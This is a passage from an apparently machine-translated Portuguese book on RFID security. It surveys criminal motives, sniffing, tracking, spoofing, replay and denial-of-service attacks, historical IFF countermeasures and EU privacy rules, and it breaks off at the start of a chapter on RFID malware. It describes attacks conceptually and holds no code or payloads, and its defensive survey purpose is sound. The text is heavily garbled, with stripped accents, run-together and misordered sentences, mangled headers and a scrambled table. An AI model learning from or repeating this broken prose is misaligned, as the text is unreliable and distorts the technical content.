Nem todo mundo considera digitais vandalismo a ser um crime grave. Pense em um site desfigurado ... alegre e divertido? Ou um ato de auto-expresso? Ou ativismo poltico? Ou a desfigurao simplesmente criminal? Uma coisa certa: No importa o quo frvola tais atos pode parecer, vandalismo digital no definitivamente inofensivos. Software de segurana McAfee estima que a empresa cybertheft e vandalismo custo da economia de US $ 20 bilhes por ano [130]. Pior ainda, os criminosos praticar outros atos de vandalismo na Internet, tais como Distributed Denial of Service (DDoS), que causam perdas monetrias e constrangimento pblico. Por exemplo, em 2000, os ataques DDoS no Yahoo!, eBay, Amazon.com e outros portais Web proeminente custo aproximadamente US $ 1,2 billeo em perda de receita combinada. Vandalismo digital , portanto, uma arma conveniente para concorrentes e inimigos. No entanto, com fins lucrativos criminosos descobriram tambm o utilitrio de vandalismo, eles usam ataques DDoS (via botnets) para extorquir dinheiro websites, oferecendo "proteo" dos ataques se eles so pagos uma taxa. Vandalismo deste tipo susceptvel de cross-over para o domnio RFID. Criminals poderiam vandalizar bancos de dados de alto valor (como o Servio de Informao EPC bases de dados) para fins de extorso ou concorrncia aleijado. Por exemplo, RFID-wielding bandidos, poderia usar uma tcnica semelhante cryptoviruses [181] s tentativas de extorso assessor. Demonstrou pela primeira vez em 1989, um cryptovirus emprega de nvel militar de criptografia para tomar como refm de dados. O invasor pode criptografar os dados no banco de dados da vtima (talvez usando um worm RFID), e em seguida, enviar um resgate nota, exigindo que uma quantia especfica de dinheiro enviado para uma conta de epayment mantida pelo usurio remotopiorar esta (Egold, Webmoney, etc), em criminosos Infelizmente, RFID s faz malicioso situao, permitindo que os troca para a descriptografia chave habilitao do "seqestrado" de dados. vandalize tagged objetos fsicos, atravs de seus dados correspondentes tag RFID. Isto mais vividamente ilustrado com um exemplo; A Ford Motor Co. usa reutilizveis ativos Transponders RFID em cada veculo em suas instalaes fabris nos Estados Unidos Estados. Quando um carro entra em uma cabine de pintura, o transponder RFID consulta o banco de dados para localizar o cdigo de tinta correto, e em seguida, encaminha esta informao para um rob, que seleciona a tinta correta e sprays o veculo [54]. Leva apenas uma pequena pouco de imaginao e um clculo back-of-the-envelope para perceber o quo srio as consequncias financeiras de vandalismo seria neste cenrio. Assim, no s RFID dar aos criminosos uma capacidade sem precedentes de computador para causar financeira dano, mas aumenta a sua influncia para a realizao de high-stakes extorso.

28

RFID S EGURANA E

PRIVACY

CHAP. 3

RFID-Enabled roubo de identidade Sem o conhecimento de muitos, a Internet uma sala de aula, local de encontro, e bazar para ladres de dados pessoais / financeiras. Roubo de identidade lucrativo - pessoal ou roubados dados financeiros podem ser revendidos no mercado negro. Visa, por exemplo, roubados ou Detalhes Mastercard vender para cada um [183] US $ 100. Os criminosos ento fazer online compras, tendo os bens entregues a uma queda, que depois so revendidos atravs leiles online. Listas de 30 milhes de endereos de e-mail tambm pode ser comprado por menos de US $ 100 [154]. Segundo a Comisso Federal de Comrcio, cerca de 10 milhes de americanos tm suas informaes pessoais abusada a cada ano, custando consumidores $ 5 bilhes e as empresas 48000000000 $ anualmente [183]. Roubo de identidade to lucrativo, provvel que transitar para a arena RFID. Existem vrias maneiras que os criminosos pode executar RFID roubo de perinformaes pessoais / financeiras; um exemplo vivo so os ataques contra a desnatao RFID cartes de crdito. Dois pesquisadores da Universidade de Massachusetts em Amherst, Tom Heydt-Benjamin e Kevin Fu, recentemente demonstrou a desnatao de cleartext informaes de cartes de RFID de crdito [63], incluindo o nome do titular do carto e nmero de carto de crdito. Eles a apelidaram de "Johnny Carson ataque", depois de Carson "Carnac, o Magnfico" sketch, onde telogos respostas sem fisicamente abrindo um envelope contendo as perguntas. Heydt-Benjamin e Fu hipesize que, de tal forma, os criminosos poderiam subornar funcionrios dos correios para a colheita informaes de carto de crdito a partir de envelopes selados. Os criminosos tambm poderiam adotar RFID malwares [132] como uma ferramenta para roubo de identidade. RFID malware composto por RFID exploits (buffer overflows, insero de cdigo, SQL injection), RFID worms (exploits RFID que baixar e executar remoto malware) e vrus de RFID (RFID exploits que aproveitam software de back-end para copiar o exploit original para recm-surgida tags RFID). Os atacantes poderiam, assim, uso de etiquetas RFID como uma forma de baixo risco para instalar malware remoto, talvez at a colheita pessoal / financeiras de dados do banco de dados back-end. Para continuar a analogia, os criminosos procura de leitores de RFID poderiam vulnerveis executar "RFID wardriving" (modelado aps WiFi wardriving [17] ou warkitting [157], onde os criminosos perambular pelas ruas procura de leitores RFID explorveis). Ou perhaps, se eles procuram uma vulnerabilidade no especficas RFID middleware, os criminosos poderiam tentar sua mo em RFID "difuso", o que implica o uso de RFID para emuladores correualeatoriamente enviar dados parcialmente invlido para RFID RFID middleware, com a finalidade de vulnerablity deteco automatizado. Spamming (ou seja, enviando dezenas de e-mails indesejados) outro frustrante prtica que os criminosos utilizam para lucrar com a Internet. A percepes erradas comuns percepo que os spammers ganham dinheiro das vendas do produto, mas a realidade que spammers principalmente obter suas receitas de outras fontes [95]. Estes podem incluir banners (que pagar o spammer por clique), a descarga dissimuladas de um pro-

SCE . 3,2

ATTACKER MODELO

29

grama que disca um prmio de nmero de telefone taxa, o pagamento para aceitar inexistente itens, e "pump and dump" esquemas de aes, que incentivar as pessoas a comprar (assim aumentar o preo do) uma determinada ao, por isso os spammers podem depois vend-lo para um lucro [95]. Tags RFID tambm poderia ser inscrito para "spamming" fins, por exemplo, um EPC Tag Gen2 poderia ter um URI bogus, que aponta para um banner em vez de um ONS receita de servidores, ganhando assim para o spammer por tag ler. RFID-Enabled Theft Fsica Mesmo na era digital, ambos os criminosos de alto e baixo-stakes ainda perseguir o physroubo ical de objetos do mundo real. Carros tornar um alvo atraente - de acordo com a National Insurance Crime Bureau (NICB), as perdas totais devido ao roubo de veculos so mais de US $ 8 bilhes por ano [87]. Identificao (fake ou no) tambm merece uma boa quantidade no mercado negro: Stolen passaportes autnticos valem 7.500 dlares cada, e os falsificados so no valor de $ 1500 cada [52]. Gadgets e itens comerciais tambm atrair roubo - a indstria de varejo dos EUA perde 46.000 milhes dlares anualmente para o varejo e roubo de cadeia de fornecimento [182], e as perdas de carga roubada "no transporte" tem sido estimados em torno de 12.000 milhes dlares [67]. RFID agora aguardado como uma ferramenta para assegurar esses artigos do bilhete grande, a partir de carros, passportas e itens de varejo, para contentores de 40 ps de transporte. claro, tradicional seguprocedimentos de segurana alimentar e ferramentas ainda esto disponveis. Mas, se RFID prova ser o mais fraco " link, "fazer o roubo de big-ticket itens fsicos mais fcil, mesmo tecnicamente criminosos ingnuo vai comear a tomar nota. RFID-ataques especficos podem facilitar o roubo de servios (de uso de ski elevadores, ou de transportes pblicos, para enganar os sistemas de pagamento de pedgio da estrada) ou que dos objetos fsicos. Um dos exemplos mais bvios de RFID especficas roubo desativar ou trocar as etiquetas RFID em objetos de retalho (por exemplo, colocando a tag de um $ 199 televiso estabelecida em um $ 399 um). No entanto, RFID tambm pode permitir que criminosos para roubar maiores bilhete itens. Um exemplo clssico disso o 2005 Johns Hopkins University / RSA Security ataque contra o Transponder Signal Texas Instruments Digital (TIDST) [20]. Durante a sua anlise de segurana, a equipe JHU / RSA engenharia reversa os detalhes da cifra de propriedade da TI, e depois usou um array de 16 FPGAs de crack as chaves de 40 bits de criptografia em tags de DST em pouco menos de uma hora. Essas chaves foram ento utilizado para criar etiquetas de DST clonado, o que permitiu ao grupo para desativar um veculo imobilizador em um automvel Ford 2005, e para a obteno de gs em vrios ExxonMobil locais sem pagar. Talvez surpreendentemente, o JHU / RSA ataque de Segurana no to acadmica como alguns as pessoas possam pensar, existem casos documentados de ladres do mundo real carro roubado carros ataques via wireless na entrada de keyless e sistemas de ignio [10]. Em um caso, ladres roubaram dois dos David Beckham BMW X5 SUVs em seis meses, utilizando laptops sem fio brute-force a chave de autenticao para o carro-imobilizao

30

RFID S EGURANA E

PRIVACY

CHAP. 3

o do sistema. Demorou at 20 minutos para recuperar a chave, ento os ladres seguiram Beckham a um shopping center onde ele tinha um almoo marcado, e atacaram o carro depois que estava estacionado [10]. Independentemente da tecnologia anti-roubo usados, caros objetos fsicos atrair high-stakes atacantes. Apesar da curva de aprendizagem, os criminosos inevitavelmente evoluir suas tcnicas para se adaptar aos avanos tecnolgicos. E se ele prova ser suficientemente rentvel, os criminosos vo aprender como atacar RFID.

3.3. BAIXO NVEL ATAQUES


Associao RFID com big-ticket objetos fsicos podem fazer o mesmo no criminosos tecnicamente savvy tomar nota. Esta prxima seo discute os principais classes de baixo nvel ataques contra os sistemas RFID.

3.3.1. Sniffing
Tags RFID so "promscuos", eles so projetados para serem lidos por qualquer compliant leitor. Infelizmente, isso permite que os leitores no autorizado para digitalizar itens com a tag unbeknownst ao seu portador, muitas vezes a grandes distncias. Dados de RFID tambm podem ser coletadas por espionagem no canal de RFID sem fio. Acesso irrestrito a dados tag pode ter implicaes srias, os dados coletados tag pode revelar informaes como predisposies mdicas ou incomuns inclinaes pessoais, o que poderia causar negao de cobertura de seguro ou de emprego para um indivduo.

3.3.2. Rastreamento
A tecnologia RFID facilita o monitoramento clandestino de pessoas ", ondeabouts e aes. Leitores RFID colocados em locais estratgicos (como portas) pode gravar respostas tags RFID "nica, que pode ento ser persistentemente associado a identidade de uma pessoa. Etiquetas RFID sem identificadores nicos tambm pode facilitate rastreamento atravs da formao de constelaes que so grupos recorrentes de tags que so associados a um indivduo. A tecnologia RFID permite tambm o monitoramento de engrupos de pneus de pessoas. Sindicato dos trabalhadores baseada no Reino Unido 'GMB recentemente convidou o Comisso Europeia para proibir a etiquetagem RFID dos empregados no local de trabalho. GMB acusou os empregadores de pessoal de armazm "desumanizao" forando-os a usar os computadores que controlam o tempo que leva para completar tarefas com RFID tag objetos [103]. Grupos de liberdades civis tambm alertam que os governos poderiam monitorar movimentos dos indivduos, ameaando eliminar o anonimato em locais pblicos.

SCE . 3,4

LOW-L Evel ATTACKS

31

3.3.3. Spoofing
Atacantes podem criar "autntico" tags RFID, por escrito, devidamente formatado dados sobre etiquetas RFID em branco. Por exemplo, os ladres poderiam retag itens em um supermercado identificando-os como semelhantes, mas mais barato, os produtos. Etiqueta clonagem um outro tipo de spoofing ataque, que produz cpias no autorizadas de tags RFID legtima. Pesquisadores da Johns Hopkins University recentemente clonado um criptograficamente protegidos Texas Instruments transponder DST, que eles usaram para comprar gasolina e desbloquear um sistema baseado em DST imobilizao do carro [20], conforme descrito anteriormente.

3.3.4. Ataques de replay


Pelo menos trs pesquisadores (Jonathan Westhues, Gerhard Hancke, e Roel Verdult) ter descrito de forma independente e / ou implementados dispositivos RFID repetio. Repetio dispositivos so capazes de interceptar e retransmitir consultas RFID, o que poderia ser usado para abusar de uma variedade de aplicaes RFID. Nova Inglaterra RFID placas (e-Chapas) so um exemplo de um sistema RFID moderna que estiveis ao ataque de um dispositivo de replay. Os ativos e Placa-tags conter uma ID criptografado cdigo que armazenado no banco de dados do Ministrio britnico dos Transportes do veculo. Uma attacker pode simplesmente gravar o identificador criptografado quando da matrcula de outro carro scaneado, e ento reproduzi-la de volta mais tarde (talvez fornecendo uma maneira prtica de evitar a Taxa de Congestionamento na conduo para o centro de Londres).

3.3.5. Denial of Service


Sistemas RFID s funcionam quando as etiquetas RFID e back-end bancos de dados esto disponveis. O ladro loja astuto pode realizar Denial of Service para roubar itens com etiquetas RFID, por remoo de marcas dos itens completamente, ou temporariamente desativ-las por colocando-os em um "saco booster" com revestimento em alumnio (Faraday gaiola) RFID que blocos de leitura sinais de consulta ers '.2Outro ataque leva o oposto abordagem alagamento RFID sistemas com mais dados do que o sistema pode suportar. Anti-RFID ativistas discutida a remoo de etiquetas RFID e depois plant-las aleatoriamente em outros artigos. Isso faria com que os sistemas de RFID para gravar grandes quantidades de completamente intil 2OColorado State Legislativo aprovou uma lei em 2001 que o torna uma contraveno de fazer, dados, assim desacreditar e desvalorizar a tecnologia RFID como umus-lo para enganar lojas ' desgaste, ou saber que outros esto vestindo roupas ntimas de alumnio, se eles pretendem todo.
proteo anti-furto dispositivos.

32

RFID S EGURANA E

PRIVACY

CHAP. 3

3.4. COMBATE RFID


A frente eletrnica da Segunda Guerra Mundial no foi chamado o "Assistente de Guerra" para nada. IFF problemas de segurana relacionados forou um grupo de heris uniformizados para desenvolver contramedidas inovadora tecnolgica. Modernos de segurana RFID solues tm evoludo a partir parcialmente este trabalho. No entanto, Modern RFID representa uma conjunto especial de problemas e obstculos, que vai exigir um grupo de acadmicos e pesquisadores da indstria para mostrar o talento mesmo que os magos que vieram antes -los. 3.4.1. Perspectiva Histrica Criptografia Os EUA Fora Area elaborado criptgrafos graves para a guerra esforo, incluindo Horst Feistel (que mais conhecido por seu trabalho sobre a Lcifer e Cifras de bloco DES). Feistel desenvolveu dispositivos seguros IFF durante a dcada de 1940 e 1950, incluindo um sistema IFF que mitigada ataques de repetio alemo. O sistema de temperatura funciona da seguinte forma: os interrogadores IFF enviar um sinal de rdio contendo um random desafio a aeronave no identificada. Avies amigvel criptografar o desafio e enviar o resultado de volta para o interrogador, que decodifica e valida a resposta. Enemy avies no so capazes de reproduzir as respostas registradas, porque enconposterior ters usar um desafio diferente [96]. Desde 1950, Feistel de duas passagens desafioresposta paradigma tem resistido ao teste do tempo, e tem encontrado inmeros prestatstica usa em todos os tipos de aplicaes. O esquema tambm ainda distingue amigvel de aeronaves hostis no XII MK IFF sistemas de hoje [30]. Deteco / Evaso Durante a guerra, ambos os lados tentaram localizar os radares inimigos e dispositivos de bloqueio, para que eles pudessem tomar ao evasiva ou de retaliao. Aeronaves aliadas Dispositivos Radar usado Prediction (RPD), que foram mapas em relevo de inimigo terrihistria que mostrava locais radar suspeita. O PPR indicado deteco fraca ou pontos cegos no radar inimigo, o que ajudou a avies aliados para escapar deteco [119]. Desativao temporria Pilotos de bombardeiros da RAF na Segunda Guerra Mundial aprendeu a duras forma que as aeronaves so rastreveis por transponders sua IFF. Mas a soluo para este problema era simples, como explica Mahurin 'Bud' piloto EUA coronel Walker. Mahurin estava realizando ataques no espao areo chins durante a Guerra da Coria, e um dia ele foi convocado sede da Quinta Fora Area. O comandante Geral veio storming, e bateu na mesa para repreender Mahurin violar a linha de demarcao China-Coria. O general ameaou com uma corte marcial - e, em seguida, advertiu em um tom mais baixo de voz: "Se voc vai cruzar

SCE . 3,4

RFID C OUNTERMEASURES

33

o Yalu, pelo amor de Deus, desligue o seu amigo de identificao ou sistema de inimigo, porque podemos rastre-lo no radar "[143]. Outras tcnicas, para Os Aliados usaram uma srie de outras tcnicas para proteger Dispositivos IFF contra ataques. Frequency-hopping spread spectrum (FHSS) foi um mtodo inovado para combater a espionagem e interferncia de sinal. Inventado em 1942 pela atriz Hedy Lamarr e compositor George Antheil, FHSS um mtodo de transmisso de sinais pela rpida mudana entre um portador de frequncia vrias chanNels, usando uma seqncia pseudo-conhecido para o transmissor eo receptor. Alm disso, IFF spoofing transponder foi combatida, fornecendo IFF transders com um cdigo secreto, os equipamentos roubados para interrogatrio IFF no poderia ser usado por foras inimigas, sem a entrada peridica deste cdigo.

3.4.2. Controles tecnolgicos


Em contraste com os sistemas IFF, moderno RFID tende a impor limitaes fsicas de mecanismos de tag-segurana; 15 microampres de poder e 5.000 portas para um 0,35 micrmetro processo CMOS tpico [40]. Para lidar com essas limitaes, pesquisadores criaram ultraleve solues de criptografia e de procedimentos, que so agrupados em categorias semelhantes como as solues IFF-based.

Criptografia Pesquisadores desenvolveram verses leves do simtrica tecla [40] ea chave pblica [48] de criptografia. RFID especficos esquemas de autenticao tambm surgiram, algumas das quais so leves, usando tcnicas como "minimalist criptografia "[72] e" autenticao humano-computador "[79]. Outros esquemas complexidade descarregar a um banco de dados back-end, como bloqueios de hash [138] [169] e EPCservidores de autenticao global proposta [156]. Um dos primeiros RFID especfica auesquemas thentication a ser amplamente implantado o de chave simtrica bsico baseado Accesso de controle de passaportes digital [2]. H tambm um esquema desenvolvido para a biblioteca RFID [111]. Deteco / Evaso Consumidores capazes de detectar "inimigo" atividade RFID tambm pode tomar suas prprias manobras evasivas. RFID c't revista Detektor [26] e FoeDados Bud privatizador [44] ajudam os usurios a detectar atividades RFID nas proximidades. Outros dispositivos ir interpretar e registrar o significado de scans RFID, tais como o Guardian RFID [134]. Os clientes tambm podem realizar mais ativo evaso RFID por "RFID bloqueio" em eiExiste uma distribudos [77] ou centralizada [133] da moda. Desativao temporria Assim como pilotos de caa desativados seus dispositivos para IFF escapar da deteco, os consumidores podem, por vezes, desactivar as etiquetas de RFID para escapar

34

RFID S EGURANA E

PRIVACY

CHAP. 3

mais modernas ameaas de dia. Um mtodo de desativao temporria tag usar um Faragaiola dia, tais como as mangas RF-desviando metlica que ser emitido com digpassaportes ital. Para desativao da etiqueta permanente, Karjoth e Moskovitz criado "Tags Clipped" [80] que podem ser portadores de deficincia fsica por arrancar a antena. Repesquisadores tambm criaram a tag-mecanismos para a SW desativao tag iniciada. EPCglobal etiquetas vm com uma funo protegida por senha matar que permanentemente desativa tags, e algumas tags mais caro pode oferecer uma protegida por senha sleep / wake funo, que desativa temporariamente e depois reativa RFID tags. Outras tcnicas, para H uma srie de outras tcnicas para proteger RFID devcios contra ataques. Em uma veia semelhante a modificao, FHSS peridica da apdesaparecimento da identificadores tag RFID e / ou dados pode impedir o acesso no autorizado tag. Pseudnimos em tags RFID consistem de uma lista de nomes que so atualizadas periodicamente quer por leitores RFID de confiana [72], ou atravs de uma marca on- pseudorandom nmero de genErator. Dados de tag tambm pode ser periodicamente re-criptografados por um "mixnet" de RFID leitores [51].

3.4.3. Processual-Level Controls


RFID implantadores devem ter alto nvel RFID / polticas de segurana de TI, interorganizacional polticas de segurana (ie EPCglobal), e as polticas de alto nvel de privacidade de RFID coleta de de dados. Implantadores tambm tm a obrigao de sensibilizar a opinio pblica sobre a inHerent perigos de seus sistemas de RFID, para ajudar a impedir que os usurios fiquem exploited. Alm disso, RFID implantadores necessidade de recorrer a utilizao de outros tipos de segurana controles para complementar as fornecidas pelo RFID. Por exemplo, acesso fsico controle uma medida de segurana crtica para muitas aplicaes de alto risco; aleatria inspeo pode ajudar a assegurar que as etiquetas RFID pertencem aos seus correspondentes physobjetos ical. Controlos no local, tais podem ajudar a proteger os objetos que vo desde o transporte recipientes para o e-Pedigreed drogas. A auditoria uma ferramenta que os operadores do sistema RFID pode usar para verificar a-ser comportamento de seus sistemas. Alm disso, arquitetos de sistema RFID deve dedicar ateno a oferecer cursos de conscientizao de segurana de treinamento para operadores de RFID, e deve exworkshops explicitamente definidos os procedimentos para eliminao tag segura. Para mais exemplos de prticas senso comum conselhos sobre como proteger os sistemas de RFID, o leitor aconselhado a olhar para o National Institute of Standards and Technology (NIST) RFID Segurana Orientaes (NIST SP 800-98) [120].

SCE . 3,4

RFID C OUNTERMEASURES

35

3.4.4. Poltica de Controles de Nvel


Legislao atende s necessidades de segurana e privacidade das pessoas em RFID ambientes. As pessoas tm criado informal "cdigos de conduta" que se inspirao a partir de fontes to variadas como o Bill of Rights [46] e os Dez Mandamentos [88]. Houve tambm tentativas formais para criar RFID legislao de privacidade na locaes dos EUA (California / Novo Mxico / Utah / Massachusetts), para o Japo, a da Unio Europeia. Um exemplo recente desta legislao proposta tem originado da Unio Europeia, onde um rgo consultivo chamado de Proteco de Dados Grupo de Trabalho, emitiu o documento "Trabalho sobre questes de proteco de dados relacionados com A tecnologia RFID "[140].

Legislao unindo com Tecnologia Mesmo os parlamentares enfatizam que tecnosolues lgicas so essenciais para defender os direitos de privacidade das pessoas RFID. Sees 4,2 e 5 da Unio Europeia "Documento de trabalho sobre questes de proteco de dados relacionadas tecnologia RFID "[140] estado: A tecnologia pode desempenhar um papel fundamental na garantia da conformidade com as princpios de proteco de dados ... (Seo 5) Os fabricantes tm uma relao directa responsabilidade em garantir que a tecnologia compatvel com privacidade existe para ajudar os responsveis pelo tratamento cumprir as suas obrigaes sob os dados directiva relativa para manter facilitar o exerccio pela legislao Usando a tecnologia proteco eos princpios ditadosde um indivduo de privacidade direitos (Seo 4.2). rerequer uma toolkit misto de tecnologia RFID em geral, tcnicas de segurana em geral, e RFID especficos reforo da privacidade tecnologias. A discusso a seguir examinas as ferramentas tecnolgicas necessrias para implementar cada uma a privacidade da UE princpios: Visibilidade das etiquetas e leitores RFID RFID O documento de trabalho exige que os titulares dos dados so notificados sobre a presena e uso de etiquetas RFID e RFID leitores pelo tratamento dos dados. (Controladores de dados so as partes que o processo de back-end dados coletados pelas tags RFID). Acordo com os pontos 4.2 e 5.2: Dados de processamento de informao atravs de controladores de RFID teclogia deve fornecer as seguintes informaes aos titulares dos dados .. (I) o presena de etiquetas RFID em seus produtos ou suas embalagens e os presena de leitores (Seo 4.2) A ativao em tempo real de RFIDs tambm um pedao de informao a prestar aos indivduos que derivam da directiva relativa proteco de dados. Assim, tcnicas simples que permite

36

RFID S EGURANA E

PRIVACY

CHAP. 3

indicaes visuais dos estados de ativao ou activability tambm so necesnecessrias. (Seo 5.2) Implementaes de RFID compatvel pode usar sinalizao para transmitir a presena de tags RFID e leitores RFID para o pblico. No entanto, este "mecanismo de privacidade" muito fcil frustrar, para que as pessoas se beneficiariam de ter sua prpria tecnologia meio de descobrir as tags RFID e leitores RFID em torno deles. Tags RFID podem ser descobertos e gerenciados usando um porttil RFID leitor (ex. RFID telefone mvel). As pessoas tambm podem descobrir leitores RFID RFID nas proximidades, observando digitalizao atividade, talvez usando um dispositivo como c't detector revista RFID. [26]

Acesso e modificao de dados RFID Tag As pessoas tm o direito de acesso e alterar os dados nas etiquetas de RFID. De acordo com a Seo 4.2: Se as etiquetas RFID contm informaes pessoais como descrito em 3.2, os indivduos devem ter o direito de saber as informaes contidas na tag e fazer correes utilizando os meios de fcil acesso.

Acessar e alterar os dados pessoais em tags RFID exige o uso de um confivel leitor RFID nas imediaes das tags RFID em questo. (Portable RFID leitores assegurar a disponibilidade de um leitor RFID confivel.) Alm disso, este acesso pode exigir o conhecimento de todas as chaves de criptografia ou autenticao que um criptohabilitado tag RFID pode usar. Isso faz com que o gerenciamento de chaves uma questo importante. Uso de tecnologias de melhoramento da Privacidade Informaes-chave para etiquetas RFID deve ser transferidos para o usurio. Isto inclui teclas de desativao, dormir / acordar as chaves, e chaves criptogrficas. Alm disso, o usurio precisa acessar um dispositivo prximo que podem utilizar esta informao. Acordo com os pontos 4.2, 5.2 e 5.4: O controlador de dados tambm tero de informar as pessoas sobre: (V) a forma de descarte, desativar ou remover as marcas dos produtos .. e (Vi) a forma de exercer o direito de acesso informao (Seo 4.2) A presena ea natureza da tecnologia PET ... deve ser parte de a informao facilmente acessvel. (Seo 5.2) Se nenhum dispositivo que permita o indivduo para desativar a tag est disponvel, um indivduo que faz No desejo a tag para continuar a fornecer informaes sobre ele / ela vai ser impedidos de exercer esse direito ... Ambos os fabricantes e implantadores da tecnologia RFID deve garantir que tal operao de

SCE . 3,4

RFID C OUNTERMEASURES

37

desativando o tag fcil de realizar. (Seo 5.4)

Na compra de mercadorias com etiquetas RFID, todas as informaes relativas Tags RFID deve ser transferida para o usurio. Isto inclui a informao sobre reforo da privacidade tecnologias, como chaves de desativao do sono / viglia chaves, e criptographic chaves. Esta transferncia chave deve ser realizada de tal forma que a inforinformao se torna acessvel a um leitor de RFID nas proximidades confivel para uso posterior com as tags RFID recm-adquirido. A transferncia de chave entre os novos e antigos proprietrios de uma etiqueta RFID pode usar qualquer infra-estrutura no-RFID (ex. papel, Bluedente, WiFi), ou em banda comunicaes RFID para enviar as informaes relevantes. Visibilidade dos detalhes de Alto Nvel de consulta Implementaes de RFID deve fornecer alta informaes sobre o nvel para o usurio, tais como a identidade dos dados RFID controlador ou porque os dados so coletados. De acordo com a Seo 4.2: Dados de processamento de informao atravs de controladores de RFID teclogia deve fornecer as seguintes informaes aos titulares dos dados: identidade do tratamento, as finalidades do tratamento, bem como, entre outras informaes sobre os destinatrios dos dados ... Implementaes de RFID em conformidade fornecer declaraes honestas de identidade e finalidade de coleo para os consumidores. No entanto, apenas no caso da implantao de RFID no honesto, o consumidor gostaria de ter uma maneira de verificar a verdade desta passou informaes. A identidade do responsvel pelo tratamento ou deployer sistema pode ser confirmado atravs do uso de um protocolo de autenticao com o consumidor. Como as pessoas geralmente no so bons em executar a criptografia, um computador porttil de confiana ou telefone celular pode executar o protocolo de autenticao no nome do consumidor. Ainda no evidente como outras informaes passadas, como a recolha propsito, pode ser verificada. Esta troca de informaes de alto nvel entre os consumidor e RFID deployer poderia usar qualquer infra-estrutura no-RFID (ex. papor, Bluetooth, WiFi), ou in-band RFID comunicaes. Retirada consentimento Um usurio pode optar por retirar seu consentimento para RFID baseados coleta de dados. Consideraes para a retirada pode incluir pur-coleta de dados poses, a identidade do controlador dos dados, ou qualquer contexto arbitrrio outros pessoais. Em a fim de revogar o consentimento, as pessoas precisam de meios tecnolgicos para acessar a PETs em tags de RFID vontade. De acordo com a Seo 5.4:

38

RFID S EGURANA E

PRIVACY

CHAP. 3

Indivduos podem sempre retirar o seu consentimento ao tratamento de dados pessoais (ex. artigo 7 a).

Se um consumidor retira o seu consentimento para RFID baseado em coleta de dados, na tag-primitivas de controle de acesso como matar tag [36], sono / viglia modos, fechaduras hash [169], e pseudnimos [72] so todos teis para cortar o acesso tag. , A fim de activate essas primitivas tag-on, as pessoas precisam ser capazes de acessar suas prprias RFID tags, usando um leitor RFID confivel. Off tag acesso primitivas de controle como RFID Tag bloqueador [77] so tambm uma forma til de revogar o acesso s tags RFID de baixo custo. Uma vez que uma pessoa pode retirar e repor o consentimento em qualquer momento, tag controle de acesso e mecanismos de autenticao deve suportar segurana dinmica polticas, que podem se adaptar a situao do consumidor, aproveitando algum tipo de sensibilidade ao contexto. Confidencialidade de dados pessoais Dados pessoais em tags RFID deve residir na forma criptografada em um tag RFID. Essa criptografia pode ser realizada por on-tag ou off tag mecanismos de criptografia. De acordo com a Seo 5.5: Quando as etiquetas RFID conter dados pessoais, nos termos do artigo 17 da directiva relativa proteco de dados, eles devem ter embutido tcnicos medidas para evitar a divulgao no autorizada dos dados ... Mea-tais Atendendo a que tm tambm Art ex necessrio. 6.1.d da directiva relativa proteco de dados para garantir a integridade dos dados armazenados na tag, evitando assim alteraes no autorizadas.

Dados RFID tag podem ser criptografados por meio de mecanismos em tagcriptogrficos, como cifras de fluxo [41] ou de baixa potncia variantes de algoritmos de chave simtrica (como reduzida AES [40]) ou algoritmos de chave pblica (como reduo NTRU [48]). Dados de tag tambm podem ser criptografados usando um mecanismo de tag-off como externa nova criptografia [51], que especialmente til para tags RFID de baixo custo. Ambos os tipos de criptografia mechUma exigir gerenciamento de chaves, bem como a presena de um leitor RFID confivel mos Soluo Integrada Para abordar adequadamente a privacidade e proteco de dados operaes criptogrficas sobre o nome do usurio realizar questes levantadas pela Legislao RFID, cerca de 20 ferramentas tecnolgicas foram separados necessrias, que so resumidas na Tabela 3.1. Solues tecnolgicas precisam ser aproveitado de forma coordenada, para pessoas podem tirar proveito dos pontos fortes os mecanismos de "complementar e fracassas. No entanto, o cerne do problema reside no fato de que as pessoas atualmente

SCE . 3,4

RFID C OUNTERMEASURES

39

Tipo de ferramenta

Instncias especficas

Equipamento Computador porttil, porttil leitor RFID, RFID detector [26] Administrao de Segurana Gerenciamento de chaves / transferncia chave, dinmicas polticas de Comunicaes segurana Na etiqueta de autenticao Out-of-band (papel, Bluetooth, WiFi), in-band (RFID) On-tag de controle de acesso Protocolos de autenticao leve [162], [38] Off-tag de controle de acesso matando [36], sono / viglia modos, fechaduras hash [169], pseudnimos Tag On-tag criptografia [72] Off-tag criptografia Bloqueador tag [77] Outros Cifras de fluxo [41], reduziu AES [40], reduziu NTRU [48] Universal nova criptografia [51] Sensibilidade ao contexto

Tabela 3.1: Ferramentas RFID Tecnolgico

no tm meios para coordenar o uso de tantas ferramentas tecnolgicas e de privacidade tecnologias de reforo de uma vez. O consumidor se beneficiaria de ter um nico plataforma unificada que pode alavancar e coordenar todas estas ferramentas separadas. Adnalmente algumas das funcionalidades necessrias, como gerenciamento de chave / transferncia e polticas de segurana dinmica, ainda no foram desenvolvidas ainda para o reino de RFID, e uma plataforma unificada de privacidade RFID (como o Guardian RFID) proporcionaria uma bom ponto de partida para implementao de tal funcionalidade.

40

RFID S EGURANA E

PRIVACY

CHAP. 3

CCAPTULO 4

RFID Malware
Este captulo ir demonstrar que as violaes de segurana que RFID dread implantadores mais - RFID malware, RFID worms e vrus de RFID - est certo em todo o corner. Ataques RFID atualmente concebida como RFID corretamente formatado, mas falso dados, no entanto, ningum espera um tag RFID para enviar um ataque de injeo SQL ou um estouro de buffer. Infelizmente, a confiana que recebe dados de RFID tag infundado Para provar nosso ponto, este captulo ir descrever os princpios bsicos de design de RFID malware. Vamos dar exemplos concretos para vrias plataformas-alvo, com tecing um espcime totalmente ilustrado de um vrus de RFID auto-replicantes. Nossa inteno principalo por trs deste captulo incentivar designers middleware RFID adotar seguro prticas de programao.

4.1. Factores favorveis ao RFID MALWARE


RFID malwares uma caixa de Pandora que foi acumulando poeira no canto dos nossos "inteligentes" armazns e residncias. Embora a idia de vrus de RFID tem certamente cruzou a mente das pessoas, o desejo de ver a tecnologia RFID sucesso suprimiu qualquer considerao sria do conceito. Alm disso, explora RFID ainda no apareceu "in the wild" para que as pessoas convenientemente figura que as restries de energia enfrentados por RFID tags de RFID fazer instalaes invulnerveis a esses ataques. Infelizmente, esse ponto de vista no nada mais do que iluses. RFID emponentes tm um nmero de caractersticas que os tornam candidatos pendentes para explorao por malware: 1. Lotes do cdigo fonte. Tags RFID tm restries de energia que inerentemente complexidade limite, mas os sistemas back-end middleware RFID podem conter centenas de milhares, seno milhes de linhas de cdigo fonte. Se o nmero de bugs de software mdias entre 16/06 por 1.000 linhas de cdigo [14], RFID

42

RFID M ALWARE

CHAP. 4

